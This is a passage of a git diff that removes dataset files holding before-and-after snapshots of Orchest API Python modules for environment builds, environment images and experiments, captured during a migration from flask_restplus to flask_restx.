necessary or possible" - % status - }, - 200, - ) - - abort_environment_build(environment_build_uuid, status == "STARTED") - - return {"message": "Environment build was successfully ABORTED"}, 200 - - -@api.route( - "/most-recent/", -) -@api.param( - "project_uuid", - "UUID of the project for which environment builds should be collected", -) -class ProjectMostRecentBuildsList(Resource): - @api.doc("get_project_most_recent_environment_builds") - @api.marshal_with(schema.environment_builds, code=200) - def get(self, project_uuid): - """Get the most recent environment build for each environment of a project. - - Only environments for which builds have already been requested - are considered. Meaning that environments that are part of a - project but have never been built won't be part of results. - - """ - - # filter by project uuid - # use a window function to get the most recently requested build for each environment - # return - rank = ( - func.rank() - .over(partition_by="environment_uuid", order_by=desc("requested_time")) - .label("rank") - ) - query = db.session.query(models.EnvironmentBuild) - query = query.filter_by(project_uuid=project_uuid) - query = query.add_column(rank) - # note: this works because rank is of type Label and - # rank == 1 will evaluate to sqlalchemy.sql.elements.BinaryExpression since the equality - # operator is overloaded - query = query.from_self().filter(rank == 1) - query = query.with_entities(models.EnvironmentBuild) - env_builds = query.all() - - return {"environment_builds": [build.as_dict() for build in env_builds]} - - -@api.route("/most-recent//") -@api.param("project_uuid", "UUID of the project.") -@api.param("environment_uuid", "UUID of the environment.") -class ProjectEnvironmentMostRecentBuild(Resource): - @api.doc("get_most_recent_build_by_proj_env") - @api.marshal_with(schema.environment_build, code=200) - def get(self, project_uuid, environment_uuid): - """Get the most recent environment build for a project_uuid, environment_uuid pair. - Only environments for which builds have already been requested are considered. - """ - - recent = ( - db.session.query(models.EnvironmentBuild) - .filter_by(project_uuid=project_uuid, environment_uuid=environment_uuid) - .order_by(desc(models.EnvironmentBuild.requested_time)) - .first() - ) - if recent: - return recent.as_dict() - abort(404, "EnvironmentBuild not found") - - -def delete_project_environment_builds(project_uuid, environment_uuid): - """Delete environment builds for an environment. - - Environment builds that are in progress are stopped. - - Args: - project_uuid: - environment_uuid: - """ - # order by request time so that the first build might - # be related to a PENDING or STARTED build, all others - # are surely not PENDING or STARTED - env_builds = ( - models.EnvironmentBuild.query.filter_by( - project_uuid=project_uuid, environment_uuid=environment_uuid - ) - .order_by(desc(models.EnvironmentBuild.requested_time)) - .all() - ) - - if len(env_builds) > 0 and env_builds[0].status in ["PENDING", "STARTED"]: - abort_environment_build(env_builds[0].build_uuid, True) - - for build in env_builds: - db.session.delete(build) - db.session.commit() - - -def delete_project_builds(project_uuid): - """Delete up all environment builds for a project. - - Environment builds that are in progress are stopped. - - Args: - project_uuid: - """ - builds = ( - models.EnvironmentBuild.query.filter_by(project_uuid=project_uuid) - .with_entities( - models.EnvironmentBuild.project_uuid, - models.EnvironmentBuild.environment_uuid, - ) - .distinct() - .all() - ) - - for build in builds: - delete_project_environment_builds(build.project_uuid, build.environment_uuid) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.diff deleted file mode 100644 index 52648ee..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_environment_images.py b/services/orchest-api/app/app/apis/namespace_environment_images.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_environment_images.py - +++ b/services/orchest-api/app/app/apis/namespace_environment_images.py -@@ -1,7 +1,7 @@ - import logging - - from docker import errors --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - - import app.models as models - from _orchest.internals import config as _config diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.source.py deleted file mode 100644 index 1a1f374..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.source.py +++ /dev/null @@ -1,177 +0,0 @@ -import logging - -from docker import errors -from flask_restplus import Namespace, Resource - -import app.models as models -from _orchest.internals import config as _config -from _orchest.internals.utils import docker_images_list_safe, docker_images_rm_safe -from app.apis.namespace_environment_builds import ( - delete_project_builds, - delete_project_environment_builds, -) -from app.apis.namespace_experiments import stop_experiment -from app.apis.namespace_runs import stop_pipeline_run -from app.connections import docker_client -from app.utils import ( - experiments_using_environment, - interactive_runs_using_environment, - is_environment_in_use, - register_schema, - remove_if_dangling, -) - -api = Namespace("environment-images", description="Managing environment images") -api = register_schema(api) - - -@api.route( - "//", -) -@api.param("project_uuid", "UUID of the project") -@api.param("environment_uuid", "UUID of the environment") -class EnvironmentImage(Resource): - @api.doc("delete-environment-image") - def delete(self, project_uuid, environment_uuid): - """Removes an environment image given project_uuid and image_uuid - - Will stop any run or experiment making use of this environment. - """ - image_name = _config.ENVIRONMENT_IMAGE_NAME.format( - project_uuid=project_uuid, environment_uuid=environment_uuid - ) - - # stop all interactive runs making use of the environment - int_runs = interactive_runs_using_environment(project_uuid, environment_uuid) - for run in int_runs: - stop_pipeline_run(run.run_uuid) - - # stop all experiments making use of the environment - exps = experiments_using_environment(project_uuid, environment_uuid) - for exp in exps: - stop_experiment(exp.experiment_uuid) - - # cleanup references to the builds and dangling images - # of this environment - delete_project_environment_builds(project_uuid, environment_uuid) - delete_project_environment_dangling_images(project_uuid, environment_uuid) - - # try with repeat because there might be a race condition - # where the aborted runs are still using the image - docker_images_rm_safe(docker_client, image_name) - - return ( - {"message": f"Environment image {image_name} was successfully deleted"}, - 200, - ) - - -@api.route( - "/in-use//", -) -@api.param("project_uuid", "UUID of the project") -@api.param("environment_uuid", "UUID of the environment") -class EnvironmentImageInUse(Resource): - @api.doc("is-environment-in-use") - def get(self, project_uuid, environment_uuid): - in_use = is_environment_in_use(project_uuid, environment_uuid) - return {"message": in_use, "in_use": in_use}, 200 - - -@api.route( - "/dangling//", -) -@api.param("project_uuid", "UUID of the project") -@api.param("environment_uuid", "UUID of the environment") -class ProjectEnvironmentDanglingImages(Resource): - @api.doc("delete-project-environment-dangling-images") - def delete(self, project_uuid, environment_uuid): - """Removes dangling images related to a project and environment. - Dangling images are images that have been left nameless and - tag-less and which are not referenced by any run - or experiment which are pending or running.""" - - delete_project_environment_dangling_images(project_uuid, environment_uuid) - return {"message": "Successfully removed dangling images"}, 200 - - -def delete_project_environment_images(project_uuid): - """Delete environment images of a project. - - All environment images related to the project are removed - from the environment, running environment builds are stopped - and removed from the db. Dangling docker images are also removed. - - Args: - project_uuid: - """ - - # cleanup references to the builds and dangling images - # of all environments of this project - delete_project_builds(project_uuid) - delete_project_dangling_images(project_uuid) - - filters = { - "label": [ - f"_orchest_env_build_is_intermediate=0", - f"_orchest_project_uuid={project_uuid}", - ] - } - images_to_remove = docker_images_list_safe(docker_client, filters=filters) - - image_remove_exceptions = [] - # try with repeat because there might be a race condition - # where the aborted runs are still using the image - for img in images_to_remove: - docker_images_rm_safe(docker_client, img.id) - - -def delete_project_dangling_images(project_uuid): - """Removes dangling images related to a project. - - Dangling images are images that have been left nameless and - tag-less and which are not referenced by any run - or experiment which are pending or running. - - Args: - project_uuid: - """ - # look only through runs belonging to the project - filters = { - "label": [ - f"_orchest_env_build_is_intermediate=0", - f"_orchest_project_uuid={project_uuid}", - ] - } - - project_images = docker_images_list_safe(docker_client, filters=filters) - - for docker_img in project_images: - remove_if_dangling(docker_img) - - -def delete_project_environment_dangling_images(project_uuid, environment_uuid): - """Removes dangling images related to an environment. - - Dangling images are images that have been left nameless and - tag-less and which are not referenced by any run - or experiment which are pending or running. - - Args: - project_uuid: - environment_uuid: - """ - # look only through runs belonging to the project - # consider only docker ids related to the environment_uuid - filters = { - "label": [ - f"_orchest_env_build_is_intermediate=0", - f"_orchest_project_uuid={project_uuid}", - f"_orchest_environment_uuid={environment_uuid}", - ] - } - - project_env_images = docker_images_list_safe(docker_client, filters=filters) - - for docker_img in project_env_images: - remove_if_dangling(docker_img) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.target.py deleted file mode 100644 index 92c17b0..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.target.py +++ /dev/null @@ -1,177 +0,0 @@ -import logging - -from docker import errors -from flask_restx import Namespace, Resource - -import app.models as models -from _orchest.internals import config as _config -from _orchest.internals.utils import docker_images_list_safe, docker_images_rm_safe -from app.apis.namespace_environment_builds import ( - delete_project_builds, - delete_project_environment_builds, -) -from app.apis.namespace_experiments import stop_experiment -from app.apis.namespace_runs import stop_pipeline_run -from app.connections import docker_client -from app.utils import ( - experiments_using_environment, - interactive_runs_using_environment, - is_environment_in_use, - register_schema, - remove_if_dangling, -) - -api = Namespace("environment-images", description="Managing environment images") -api = register_schema(api) - - -@api.route( - "//", -) -@api.param("project_uuid", "UUID of the project") -@api.param("environment_uuid", "UUID of the environment") -class EnvironmentImage(Resource): - @api.doc("delete-environment-image") - def delete(self, project_uuid, environment_uuid): - """Removes an environment image given project_uuid and image_uuid - - Will stop any run or experiment making use of this environment. - """ - image_name = _config.ENVIRONMENT_IMAGE_NAME.format( - project_uuid=project_uuid, environment_uuid=environment_uuid - ) - - # stop all interactive runs making use of the environment - int_runs = interactive_runs_using_environment(project_uuid, environment_uuid) - for run in int_runs: - stop_pipeline_run(run.run_uuid) - - # stop all experiments making use of the environment - exps = experiments_using_environment(project_uuid, environment_uuid) - for exp in exps: - stop_experiment(exp.experiment_uuid) - - # cleanup references to the builds and dangling images - # of this environment - delete_project_environment_builds(project_uuid, environment_uuid) - delete_project_environment_dangling_images(project_uuid, environment_uuid) - - # try with repeat because there might be a race condition - # where the aborted runs are still using the image - docker_images_rm_safe(docker_client, image_name) - - return ( - {"message": f"Environment image {image_name} was successfully deleted"}, - 200, - ) - - -@api.route( - "/in-use//", -) -@api.param("project_uuid", "UUID of the project") -@api.param("environment_uuid", "UUID of the environment") -class EnvironmentImageInUse(Resource): - @api.doc("is-environment-in-use") - def get(self, project_uuid, environment_uuid): - in_use = is_environment_in_use(project_uuid, environment_uuid) - return {"message": in_use, "in_use": in_use}, 200 - - -@api.route( - "/dangling//", -) -@api.param("project_uuid", "UUID of the project") -@api.param("environment_uuid", "UUID of the environment") -class ProjectEnvironmentDanglingImages(Resource): - @api.doc("delete-project-environment-dangling-images") - def delete(self, project_uuid, environment_uuid): - """Removes dangling images related to a project and environment. - Dangling images are images that have been left nameless and - tag-less and which are not referenced by any run - or experiment which are pending or running.""" - - delete_project_environment_dangling_images(project_uuid, environment_uuid) - return {"message": "Successfully removed dangling images"}, 200 - - -def delete_project_environment_images(project_uuid): - """Delete environment images of a project. - - All environment images related to the project are removed - from the environment, running environment builds are stopped - and removed from the db. Dangling docker images are also removed. - - Args: - project_uuid: - """ - - # cleanup references to the builds and dangling images - # of all environments of this project - delete_project_builds(project_uuid) - delete_project_dangling_images(project_uuid) - - filters = { - "label": [ - f"_orchest_env_build_is_intermediate=0", - f"_orchest_project_uuid={project_uuid}", - ] - } - images_to_remove = docker_images_list_safe(docker_client, filters=filters) - - image_remove_exceptions = [] - # try with repeat because there might be a race condition - # where the aborted runs are still using the image - for img in images_to_remove: - docker_images_rm_safe(docker_client, img.id) - - -def delete_project_dangling_images(project_uuid): - """Removes dangling images related to a project. - - Dangling images are images that have been left nameless and - tag-less and which are not referenced by any run - or experiment which are pending or running. - - Args: - project_uuid: - """ - # look only through runs belonging to the project - filters = { - "label": [ - f"_orchest_env_build_is_intermediate=0", - f"_orchest_project_uuid={project_uuid}", - ] - } - - project_images = docker_images_list_safe(docker_client, filters=filters) - - for docker_img in project_images: - remove_if_dangling(docker_img) - - -def delete_project_environment_dangling_images(project_uuid, environment_uuid): - """Removes dangling images related to an environment. - - Dangling images are images that have been left nameless and - tag-less and which are not referenced by any run - or experiment which are pending or running. - - Args: - project_uuid: - environment_uuid: - """ - # look only through runs belonging to the project - # consider only docker ids related to the environment_uuid - filters = { - "label": [ - f"_orchest_env_build_is_intermediate=0", - f"_orchest_project_uuid={project_uuid}", - f"_orchest_environment_uuid={environment_uuid}", - ] - } - - project_env_images = docker_images_list_safe(docker_client, filters=filters) - - for docker_img in project_env_images: - remove_if_dangling(docker_img) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.diff deleted file mode 100644 index afe85e6..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.diff +++ /dev/null @@ -1,33 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_experiments.py b/services/orchest-api/app/app/apis/namespace_experiments.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_experiments.py - +++ b/services/orchest-api/app/app/apis/namespace_experiments.py -@@ -5,7 +5,7 @@ from datetime import datetime - from celery.contrib.abortable import AbortableAsyncResult - from docker import errors - from flask import abort, current_app, request --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - - import app.models as models - from app import schema -@@ -37,14 +37,16 @@ class ExperimentList(Resource): - @api.marshal_with(schema.experiment, code=201, description="Queued experiment") - def post(self): - """Queues a new experiment.""" -- # TODO: possibly use marshal() on the post_data -+ # TODO: possibly use marshal() on the post_data. Note that we -+ # have moved over to using flask_restx - # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.marshal - # to make sure the default values etc. are filled in. - post_data = request.get_json() - - # TODO: maybe we can expect a datetime (in the schema) so we -- # do not have to parse it here. -- # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.fields.DateTime -+ # do not have to parse it here. Again note that we are now -+ # using flask_restx -+ # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.fields.DateTime - scheduled_start = post_data["scheduled_start"] - scheduled_start = datetime.fromisoformat(scheduled_start) - diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.source.py deleted file mode 100644 index 1ccc15e..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.source.py +++ /dev/null @@ -1,438 +0,0 @@ -import logging -import uuid -from datetime import datetime - -from celery.contrib.abortable import AbortableAsyncResult -from docker import errors -from flask import abort, current_app, request -from flask_restplus import Namespace, Resource - -import app.models as models -from app import schema -from app.celery_app import make_celery -from app.connections import db -from app.core.pipelines import construct_pipeline -from app.utils import lock_environment_images_for_run, register_schema, update_status_db - -api = Namespace("experiments", description="Managing experiments") -api = register_schema(api) - - -@api.route("/") -class ExperimentList(Resource): - @api.doc("get_experiments") - @api.marshal_with(schema.experiments) - def get(self): - """Fetches all experiments. - - The experiments are either in queue, running or already - completed. - - """ - experiments = models.Experiment.query.all() - return {"experiments": [exp.__dict__ for exp in experiments]}, 200 - - @api.doc("start_experiment") - @api.expect(schema.experiment_spec) - @api.marshal_with(schema.experiment, code=201, description="Queued experiment") - def post(self): - """Queues a new experiment.""" - # TODO: possibly use marshal() on the post_data - # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.marshal - # to make sure the default values etc. are filled in. - post_data = request.get_json() - - # TODO: maybe we can expect a datetime (in the schema) so we - # do not have to parse it here. - # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.fields.DateTime - scheduled_start = post_data["scheduled_start"] - scheduled_start = datetime.fromisoformat(scheduled_start) - - experiment = { - "experiment_uuid": post_data["experiment_uuid"], - "project_uuid": post_data["project_uuid"], - "pipeline_uuid": post_data["pipeline_uuid"], - "scheduled_start": scheduled_start, - "total_number_of_pipeline_runs": len(post_data["pipeline_definitions"]), - } - db.session.add(models.Experiment(**experiment)) - db.session.commit() - - pipeline_runs = [] - pipeline_run_spec = post_data["pipeline_run_spec"] - env_uuid_docker_id_mappings = None - # this way we write the entire exp to db, but avoid - # launching any run (celery task) if we detected a problem - experiment_creation_error_messages = [] - tasks_to_launch = [] - - # TODO: This can be made more efficient, since the pipeline - # is the same for all pipeline runs. The only - # difference is the parameters. So all the jobs could - # be created in batch. - for pipeline_definition, id_ in zip( - post_data["pipeline_definitions"], post_data["pipeline_run_ids"] - ): - pipeline_run_spec["pipeline_definition"] = pipeline_definition - pipeline = construct_pipeline(**post_data["pipeline_run_spec"]) - - # specify the task_id beforehand to avoid race conditions - # between the task and its presence in the db - task_id = str(uuid.uuid4()) - - non_interactive_run = { - "experiment_uuid": post_data["experiment_uuid"], - "run_uuid": task_id, - "pipeline_run_id": id_, - "pipeline_uuid": pipeline.properties["uuid"], - "project_uuid": post_data["project_uuid"], - "status": "PENDING", - } - db.session.add(models.NonInteractivePipelineRun(**non_interactive_run)) - # need to flush because otherwise the bulk insertion of - # pipeline steps will lead to foreign key errors - # https://docs.sqlalchemy.org/en/13/orm/persistence_techniques.html#bulk-operations-caveats - db.session.flush() - - # TODO: this code is also in `namespace_runs`. Could - # potentially be put in a function for modularity. - # Set an initial value for the status of the pipeline - # steps that will be run. - step_uuids = [s.properties["uuid"] for s in pipeline.steps] - pipeline_steps = [] - for step_uuid in step_uuids: - pipeline_steps.append( - models.PipelineRunStep( - **{ - "run_uuid": task_id, - "step_uuid": step_uuid, - "status": "PENDING", - } - ) - ) - db.session.bulk_save_objects(pipeline_steps) - db.session.commit() - - non_interactive_run["pipeline_steps"] = pipeline_steps - pipeline_runs.append(non_interactive_run) - - # get docker ids of images to use and make it so that the - # images will not be deleted in case they become - # outdated by an environment rebuild - # compute it only once because this way we are guaranteed - # that the mappings will be the same for all runs, having - # a new environment build terminate while submitting the - # different runs won't affect the experiment - if env_uuid_docker_id_mappings is None: - try: - env_uuid_docker_id_mappings = lock_environment_images_for_run( - task_id, - post_data["project_uuid"], - pipeline.get_environments(), - ) - except errors.ImageNotFound as e: - experiment_creation_error_messages.append( - f"Pipeline was referencing environments for " - f"which an image does not exist, {e}" - ) - else: - image_mappings = [ - models.PipelineRunImageMapping( - **{ - "run_uuid": task_id, - "orchest_environment_uuid": env_uuid, - "docker_img_id": docker_id, - } - ) - for env_uuid, docker_id in env_uuid_docker_id_mappings.items() - ] - db.session.bulk_save_objects(image_mappings) - db.session.commit() - - if len(experiment_creation_error_messages) == 0: - # prepare the args for the task - run_config = pipeline_run_spec["run_config"] - run_config["env_uuid_docker_id_mappings"] = env_uuid_docker_id_mappings - celery_job_kwargs = { - "experiment_uuid": post_data["experiment_uuid"], - "project_uuid": post_data["project_uuid"], - "pipeline_definition": pipeline.to_dict(), - "run_config": run_config, - } - - # Due to circular imports we use the task name instead of - # importing the function directly. - tasks_to_launch.append( - { - "name": "app.core.tasks.start_non_interactive_pipeline_run", - "eta": scheduled_start, - "kwargs": celery_job_kwargs, - "task_id": task_id, - } - ) - - experiment["pipeline_runs"] = pipeline_runs - - if len(experiment_creation_error_messages) == 0: - # Create Celery object with the Flask context - celery = make_celery(current_app) - for task in tasks_to_launch: - res = celery.send_task(**task) - # NOTE: this is only if a backend is configured. The task does - # not return anything. Therefore we can forget its result and - # make sure that the Celery backend releases recourses (for - # storing and transmitting results) associated to the task. - # Uncomment the line below if applicable. - res.forget() - - return experiment, 201 - else: - logging.error("\n".join(experiment_creation_error_messages)) - - # simple way to update both in memory objects - # and the db while avoiding multiple update statements - # (1 for each object) - for pipeline_run in experiment["pipeline_runs"]: - pipeline_run.status = "SUCCESS" - for step in pipeline_run["pipeline_steps"]: - step.status = "FAILURE" - - models.PipelineRunStep.query.filter_by( - run_uuid=pipeline_run["run_uuid"] - ).update({"status": "FAILURE"}) - - models.NonInteractivePipelineRun.query.filter_by( - experiment_uuid=post_data["experiment_uuid"] - ).update({"status": "SUCCESS"}) - db.session.commit() - - return { - "message": "Failed to create experiment because not all referenced environments are available." - }, 500 - - -@api.route("/") -@api.param("experiment_uuid", "UUID of experiment") -@api.response(404, "Experiment not found") -class Experiment(Resource): - @api.doc("get_experiment") - @api.marshal_with(schema.experiment, code=200) - def get(self, experiment_uuid): - """Fetches an experiment given its UUID.""" - experiment = models.Experiment.query.get_or_404( - experiment_uuid, - description="Experiment not found", - ) - return experiment.__dict__ - - # TODO: We should also make it possible to stop a particular pipeline - # run of an experiment. It should state "cancel" the execution - # of a pipeline run, since we do not do termination of running - # tasks. - @api.doc("delete_experiment") - @api.response(200, "Experiment terminated") - def delete(self, experiment_uuid): - """Stops an experiment given its UUID. - - However, it will not delete any corresponding database entries, - it will update the status of corresponding objects to "REVOKED". - """ - if stop_experiment(experiment_uuid): - return {"message": "Experiment termination was successful"}, 200 - else: - return ( - { - "message": "Experiment does not \ - exist or is already completed" - }, - 404, - ) - - -@api.route( - "//", - doc={ - "description": ( - "Set and get execution status of pipeline runs " "in an experiment." - ) - }, -) -@api.param("experiment_uuid", "UUID of Experiment") -@api.param("run_uuid", "UUID of Run") -@api.response(404, "Pipeline run not found") -class PipelineRun(Resource): - @api.doc("get_pipeline_run") - @api.marshal_with(schema.non_interactive_run, code=200) - def get(self, experiment_uuid, run_uuid): - """Fetch a pipeline run of an experiment given their ids.""" - non_interactive_run = models.NonInteractivePipelineRun.query.filter_by( - run_uuid=run_uuid, - ).one_or_none() - if non_interactive_run is None: - abort(404, "Given experiment has no run with given run_uuid") - return non_interactive_run.__dict__ - - @api.doc("set_pipeline_run_status") - @api.expect(schema.status_update) - def put(self, experiment_uuid, run_uuid): - """Set the status of a pipeline run.""" - status_update = request.get_json() - - # The pipeline run has reached a final state, thus we can update - # the experiment "completed_pipeline_runs" attribute. - if status_update["status"] in ["SUCCESS", "FAILURE"]: - experiment = models.Experiment.query.get_or_404( - experiment_uuid, - description="Experiment not found", - ) - experiment.completed_pipeline_runs += 1 - db.session.commit() - - filter_by = { - "experiment_uuid": experiment_uuid, - "run_uuid": run_uuid, - } - update_status_db( - status_update, model=models.NonInteractivePipelineRun, filter_by=filter_by - ) - - return {"message": "Status was updated successfully"}, 200 - - -@api.route( - "///", - doc={ - "description": ( - "Set and get execution status of individual steps of " - "pipeline runs in an experiment." - ) - }, -) -@api.param("experiment_uuid", "UUID of Experiment") -@api.param("run_uuid", "UUID of Run") -@api.param("step_uuid", "UUID of Step") -@api.response(404, "Pipeline step not found") -class PipelineStepStatus(Resource): - @api.doc("get_pipeline_run_pipeline_step") - @api.marshal_with(schema.non_interactive_run, code=200) - def get(self, experiment_uuid, run_uuid, step_uuid): - """Fetch a pipeline step of a run of an experiment given uuids.""" - step = models.PipelineRunStep.query.get_or_404( - ident=(run_uuid, step_uuid), - description="Combination of given experiment, run and step not found", - ) - return step.__dict__ - - @api.doc("set_pipeline_run_pipeline_step_status") - @api.expect(schema.status_update) - def put(self, experiment_uuid, run_uuid, step_uuid): - """Set the status of a pipeline step of a pipeline run.""" - status_update = request.get_json() - - filter_by = { - "run_uuid": run_uuid, - "step_uuid": step_uuid, - } - update_status_db( - status_update, - model=models.PipelineRunStep, - filter_by=filter_by, - ) - - return {"message": "Status was updated successfully"}, 200 - - -@api.route("/cleanup/") -@api.param("experiment_uuid", "UUID of experiment") -@api.response(404, "Experiment not found") -class ExperimentDeletion(Resource): - @api.doc("delete_experiment") - @api.response(200, "Experiment deleted") - def delete(self, experiment_uuid): - """Delete an experiment. - - The experiment is stopped if its running, related entities - are then removed from the db. - """ - if delete_experiment(experiment_uuid): - return {"message": "Experiment deletion was successful"}, 200 - else: - return {"message": "Experiment does not exist"}, 404 - - -def stop_experiment(experiment_uuid) -> bool: - """Stop an experiment. - - Args: - experiment_uuid: - - Returns: - True if the experiment exists and was stopped, false - if it did not exist or if it was already completed. - """ - experiment = models.Experiment.query.filter_by( - experiment_uuid=experiment_uuid - ).one_or_none() - if experiment is None: - return False - - run_uuids = [ - run.run_uuid - for run in experiment.pipeline_runs - if run.status in ["PENDING", "STARTED"] - ] - if len(run_uuids) == 0: - return False - - # Aborts and revokes all pipeline runs and waits for a - # reply for 1.0s. - celery = make_celery(current_app) - celery.control.revoke(run_uuids, timeout=1.0) - - # TODO: possibly set status of steps and Run to "ABORTED" - # note that a race condition would be present since the task - # will try to set the status as well - for run_uuid in run_uuids: - res = AbortableAsyncResult(run_uuid, app=celery) - # it is responsibility of the task to terminate by reading \ - # it's aborted status - res.abort() - - # Update the status of the run and step entries to "REVOKED". - models.NonInteractivePipelineRun.query.filter_by(run_uuid=run_uuid).update( - {"status": "REVOKED"} - ) - - models.PipelineRunStep.query.filter_by(run_uuid=run_uuid).update( - {"status": "REVOKED"} - ) - - db.session.commit() - return True - - -def delete_experiment(experiment_uuid) -> bool: - """Delete an experiment. - - If running, the experiment is aborted. All data related - to the experiment is removed. - - Args: - experiment_uuid: - - Returns: - True if the experiment existed and was removed, false - otherwise. - """ - experiment = models.Experiment.query.filter_by( - experiment_uuid=experiment_uuid - ).one_or_none() - if experiment is None: - return False - - stop_experiment(experiment_uuid) - # non interactive runs -> non interactive run image mapping - # non interactive runs step - db.session.delete(experiment) - db.session.commit() - return True diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.target.py deleted file mode 100644 index 2511c2f..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.target.py +++ /dev/null @@ -1,440 +0,0 @@ -import logging -import uuid -from datetime import datetime - -from celery.contrib.abortable import AbortableAsyncResult -from docker import errors -from flask import abort, current_app, request -from flask_restx import Namespace, Resource - -import app.models as models -from app import schema -from app.celery_app import make_celery -from app.connections import db -from app.core.pipelines import construct_pipeline -from app.utils import lock_environment_images_for_run, register_schema, update_status_db - -api = Namespace("experiments", description="Managing experiments") -api = register_schema(api) - - -@api.route("/") -class ExperimentList(Resource): - @api.doc("get_experiments") - @api.marshal_with(schema.experiments) - def get(self): - """Fetches all experiments. - - The experiments are either in queue, running or already - completed. - - """ - experiments = models.Experiment.query.all() - return {"experiments": [exp.__dict__ for exp in experiments]}, 200 - - @api.doc("start_experiment") - @api.expect(schema.experiment_spec) - @api.marshal_with(schema.experiment, code=201, description="Queued experiment") - def post(self): - """Queues a new experiment.""" - # TODO: possibly use marshal() on the post_data. Note that we - # have moved over to using flask_restx - # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.marshal - # to make sure the default values etc. are filled in. - post_data = request.get_json() - - # TODO: maybe we can expect a datetime (in the schema) so we - # do not have to parse it here. Again note that we are now - # using flask_restx - # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.fields.DateTime - scheduled_start = post_data["scheduled_start"] - scheduled_start = datetime.fromisoformat(scheduled_start) - - experiment = { - "experiment_uuid": post_data["experiment_uuid"], - "project_uuid": post_data["project_uuid"], - "pipeline_uuid": post_data["pipeline_uuid"], - "scheduled_start": scheduled_start, - "total_number_of_pipeline_runs": len(post_data["pipeline_definitions"]), - } - db.session.add(models.Experiment(**experiment)) - db.session.commit() - - pipeline_runs = [] - pipeline_run_spec = post_data["pipeline_run_spec"] - env_uuid_docker_id_mappings = None - # this way we write the entire exp to db, but avoid - # launching any run (celery task) if we detected a problem - experiment_creation_error_messages = [] - tasks_to_launch = [] - - # TODO: This can be made more efficient, since the pipeline - # is the same for all pipeline runs. The only - # difference is the parameters. So all the jobs could - # be created in batch. - for pipeline_definition, id_ in zip( - post_data["pipeline_definitions"], post_data["pipeline_run_ids"] - ): - pipeline_run_spec["pipeline_definition"] = pipeline_definition - pipeline = construct_pipeline(**post_data["pipeline_run_spec"]) - - # specify the task_id beforehand to avoid race conditions - # between the task and its presence in the db - task_id = str(uuid.uuid4()) - - non_interactive_run = { - "experiment_uuid": post_data["experiment_uuid"], - "run_uuid": task_id, - "pipeline_run_id": id_, - "pipeline_uuid": pipeline.properties["uuid"], - "project_uuid": post_data["project_uuid"], - "status": "PENDING", - } - db.session.add(models.NonInteractivePipelineRun(**non_interactive_run)) - # need to flush because otherwise the bulk insertion of - # pipeline steps will lead to foreign key errors - # https://docs.sqlalchemy.org/en/13/orm/persistence_techniques.html#bulk-operations-caveats - db.session.flush() - - # TODO: this code is also in `namespace_runs`. Could - # potentially be put in a function for modularity. - # Set an initial value for the status of the pipeline - # steps that will be run. - step_uuids = [s.properties["uuid"] for s in pipeline.steps] - pipeline_steps = [] - for step_uuid in step_uuids: - pipeline_steps.append( - models.PipelineRunStep( - **{ - "run_uuid": task_id, - "step_uuid": step_uuid, - "status": "PENDING", - } - ) - ) - db.session.bulk_save_objects(pipeline_steps) - db.session.commit() - - non_interactive_run["pipeline_steps"] = pipeline_steps - pipeline_runs.append(non_interactive_run) - - # get docker ids of images to use and make it so that the - # images will not be deleted in case they become - # outdated by an environment rebuild - # compute it only once because this way we are guaranteed - # that the mappings will be the same for all runs, having - # a new environment build terminate while submitting the - # different runs won't affect the experiment - if env_uuid_docker_id_mappings is None: - try: - env_uuid_docker_id_mappings = lock_environment_images_for_run( - task_id, - post_data["project_uuid"], - pipeline.get_environments(), - ) - except errors.ImageNotFound as e: - experiment_creation_error_messages.append( - f"Pipeline was referencing environments for " - f"which an image does not exist, {e}" - ) - else: - image_mappings = [ - models.PipelineRunImageMapping( - **{ - "run_uuid": 